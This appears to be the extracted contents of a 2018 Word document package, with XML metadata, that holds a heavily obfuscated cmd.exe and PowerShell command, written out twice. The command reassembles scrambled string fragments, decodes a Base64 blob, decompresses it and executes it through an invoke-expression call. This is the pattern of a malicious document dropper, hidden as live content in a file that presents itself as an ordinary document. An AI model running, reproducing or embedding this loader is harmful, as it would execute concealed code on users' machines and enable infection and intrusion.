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cmd.exe  /c"set  nQSdj= ((("{71}{102}{89}{130}{41}{6}{40}{94}{78}{9}{54}{64}{91}{39}{145}{147}{17}{63}{103}{111}{138}{50}{0}{80}{84}{32}{34}{140}{67}{85}{73}{129}{150}{42}{5}{20}{25}{65}{92}{72}{18}{132}{105}{11}{55}{149}{110}{131}{117}{137}{146}{19}{115}{151}{28}{79}{24}{70}{93}{77}{21}{12}{87}{37}{120}{108}{99}{16}{44}{74}{36}{4}{141}{100}{56}{23}{125}{90}{1}{52}{112}{66}{98}{114}{118}{136}{97}{53}{148}{139}{126}{142}{144}{109}{83}{10}{59}{96}{127}{47}{3}{106}{135}{22}{60}{113}{2}{119}{104}{51}{8}{68}{38}{15}{61}{27}{107}{14}{46}{88}{30}{133}{35}{26}{49}{128}{45}{13}{62}{86}{82}{121}{75}{95}{57}{58}{48}{81}{124}{143}{69}{134}{101}{43}{29}{116}{122}{76}{7}{33}{123}{31}" -f 'emOR','r','jr','i','Pa','FE','E','.rEadt','w==Ukl), [','Ukl)(nEW-Ob','8K7r','7Nm','Be','EACH{nEW-O','N.com','r','s','FlA','l','0X6','V/JQ8','anQRh','Z5','9Rj','/','DY','p','I','K6CdwxdJFpo','N','SSIonm','()','E','oe','M.CONVERt]:','dECOm','WoxS','XyU','COMp','io.CO','[','M','asJA','t.e','mCV','Or','p','b2ZJTlv4lU8O','ade','R','sTEm.Io.M','3O','1NKCP54i','ZVvr','j','LmE8Rir4r+b','6URIHdEZ','t','rEamRe','zl','l','ess','b','TesT','Ect ','7Am','m6G','F','io.','m_,','aO62fXpan/gKZb','. ( SMmPSho','h4B4SQi','B','zc5xbTJ1V',' sYsTEM.iO.','I)} )','Fq','X','6Wd','YsTReAm]','r','Ect','P','[SyST','ROm','j','+WwuowV+P','rE','E[4]+SMmps','s9G',' ','IKVB','vz1hLl','30]+Ukl','s','XR','B','9','8UP2D','8U4o8G','x','m','re','Z2nprdBEdRXW+','ymR','8','o','y/ZZ48KdG','v','3','aM([s','MmYNopg','pbQ2','I','FdMKsZmG4','cODinG]:','DZQLJ','cOez6','JM+El','XP',' ',':asCI','nD','(S','b13I','q79','vCJ','ESs) nAx f','Ase64STriNG(','hO','da+8F55Bk5WIDp5Et9yDQywGD','ISDUFvo','Ode]::','[tE','eL3Q','kAfw','c','Y','tqQA',':','ZHtv','q','M','Tx+','MpReSSIO','EgI','n.De','gI','SH',' UklNZDb','VGMrJ'))-rEpLaCE([ChaR]85+[ChaR]107+[ChaR]108),[ChaR]39-CRePLACE  'SMm',[ChaR]36  -CRePLACE([ChaR]110+[ChaR]65+[ChaR]120),[ChaR]124)^|^&amp;( $env:COmspeC[4,26,25]-jOIN'')&amp;&amp; PoWershELl   ${ex`eC`UtioncO`NTE`Xt}.\"I`NV`oKEcomMAnD\".(  \"{2}{3}{0}{1}\"-f 'scR','IPT','inVOk','E' ).Invoke(  (.(  \"{1}{2}{0}\"-f'iTEm','CH','ild' ) (\"{2}{1}{0}\"-f 'SDJ','Q','ENv:N'  ) ).\"vaL`Ue\" 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cmd.exe  /c"set  nQSdj= ((("{71}{102}{89}{130}{41}{6}{40}{94}{78}{9}{54}{64}{91}{39}{145}{147}{17}{63}{103}{111}{138}{50}{0}{80}{84}{32}{34}{140}{67}{85}{73}{129}{150}{42}{5}{20}{25}{65}{92}{72}{18}{132}{105}{11}{55}{149}{110}{131}{117}{137}{146}{19}{115}{151}{28}{79}{24}{70}{93}{77}{21}{12}{87}{37}{120}{108}{99}{16}{44}{74}{36}{4}{141}{100}{56}{23}{125}{90}{1}{52}{112}{66}{98}{114}{118}{136}{97}{53}{148}{139}{126}{142}{144}{109}{83}{10}{59}{96}{127}{47}{3}{106}{135}{22}{60}{113}{2}{119}{104}{51}{8}{68}{38}{15}{61}{27}{107}{14}{46}{88}{30}{133}{35}{26}{49}{128}{45}{13}{62}{86}{82}{121}{75}{95}{57}{58}{48}{81}{124}{143}{69}{134}{101}{43}{29}{116}{122}{76}{7}{33}{123}{31}" -f 'emOR','r','jr','i','Pa','FE','E','.rEadt','w==Ukl), [','Ukl)(nEW-Ob','8K7r','7Nm','Be','EACH{nEW-O','N.com','r','s','FlA','l','0X6','V/JQ8','anQRh','Z5','9Rj','/','DY','p','I','K6CdwxdJFpo','N','SSIonm','()','E','oe','M.CONVERt]:','dECOm','WoxS','XyU','COMp','io.CO','[','M','asJA','t.e','mCV','Or','p','b2ZJTlv4lU8O','ade','R','sTEm.Io.M','3O','1NKCP54i','ZVvr','j','LmE8Rir4r+b','6URIHdEZ','t','rEamRe','zl','l','ess','b','TesT','Ect ','7Am','m6G','F','io.','m_,','aO62fXpan/gKZb','. ( SMmPSho','h4B4SQi','B','zc5xbTJ1V',' sYsTEM.iO.','I)} )','Fq','X','6Wd','YsTReAm]','r','Ect','P','[SyST','ROm','j','+WwuowV+P','rE','E[4]+SMmps','s9G',' ','IKVB','vz1hLl','30]+Ukl','s','XR','B','9','8UP2D','8U4o8G','x','m','re','Z2nprdBEdRXW+','ymR','8','o','y/ZZ48KdG','v','3','aM([s','MmYNopg','pbQ2','I','FdMKsZmG4','cODinG]:','DZQLJ','cOez6','JM+El','XP',' ',':asCI','nD','(S','b13I','q79','vCJ','ESs) nAx f','Ase64STriNG(','hO','da+8F55Bk5WIDp5Et9yDQywGD','ISDUFvo','Ode]::','[tE','eL3Q','kAfw','c','Y','tqQA',':','ZHtv','q','M','Tx+','MpReSSIO','EgI','n.De','gI','SH',' UklNZDb','VGMrJ'))-rEpLaCE([ChaR]85+[ChaR]107+[ChaR]108),[ChaR]39-CRePLACE  'SMm',[ChaR]36  -CRePLACE([ChaR]110+[ChaR]65+[ChaR]120),[ChaR]124)^|^&amp;( $env:COmspeC[4,26,25]-jOIN'')&amp;&amp; PoWershELl   ${ex`eC`UtioncO`NTE`Xt}.\"I`NV`oKEcomMAnD\".(  \"{2}{3}{0}{1}\"-f 'scR','IPT','inVOk','E' ).Invoke(  (.(  \"{1}{2}{0}\"-f'iTEm','CH','ild' ) (\"{2}{1}{0}\"-f 'SDJ','Q','ENv:N'  ) ).\"vaL`Ue\" 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6:00Z</dcterms:created>
  <dc:creator>Adam-PC</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-09T13:06:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>